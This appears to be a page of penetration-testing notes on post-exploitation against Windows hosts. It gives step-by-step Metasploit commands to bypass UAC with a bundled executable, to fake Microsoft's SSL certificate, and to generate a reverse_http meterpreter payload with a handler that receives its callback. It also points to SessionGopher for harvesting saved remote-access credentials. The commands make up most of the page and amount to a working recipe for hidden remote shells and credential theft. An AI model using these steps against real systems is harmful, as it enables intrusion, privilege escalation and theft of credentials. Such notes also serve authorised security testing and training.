Introduction

4 post-exploit steps

Privilege Escalation and Maintaining access
Data Harvesting
Internal Network Scan
Exploitation of new systems and pivoting

Also in Metasploit, there is a compiled UAC bypass payload in /usr/share/metasploit-framework/data/post/bypassuac-x64.exe

To use, drop this executable in the target system. In the cmd:

bypassuac-x64.exe cmd.exe

Then you will have a cmd shell as the user, but with the privilege of admin.

use multi/handler
<snip>
set AutoRunScript explorer.exe
set AutoRunScript migrate -f

SessionGopher

SessionGopher is a PowerShell tool that uses WMI to extract saved session information for remote access tools such as WinSCP, PuTTY, SuperPuTTY, FileZilla, and Microsoft Remote Desktop. It can be run remotely or locally.

GitHub - Arvanaghi/SessionGopher: SessionGopher is a PowerShell tool that uses WMI to extract saved session information for remote access tools such as WinSCP, PuTTY, SuperPuTTY, FileZilla, and Microsoft Remote Desktop. It can be run remotely or locally.GitHub

Impersonate SSL

In msfconsole, there is an aux module to do this:

use auxiliary/gather/impersonate_ssl
set RHOST www.microsoft.com
run

Then generate the payload:

use payload/windows/x64/meterpreter/reverse_http
use LHOST x.x.x.x
use LPORT xxxx
set handlersslcert <path_to_impersonate_pem>
set stagerverifysslcert true
generate -t exe -f <destination_path>

Then create a multi handler with the same config:

use exploit/multi/handler
set LHOST x.x.x.x
set LPORT xxxx
set handlersslcert <path_to_impersonate_pem>
set stagerverifysslcert true
set payload windows/x64/meterpreter/reverse_http
exploit -j

PreviousWebDAV NextPrivilege Escalation

Last updated 4 years ago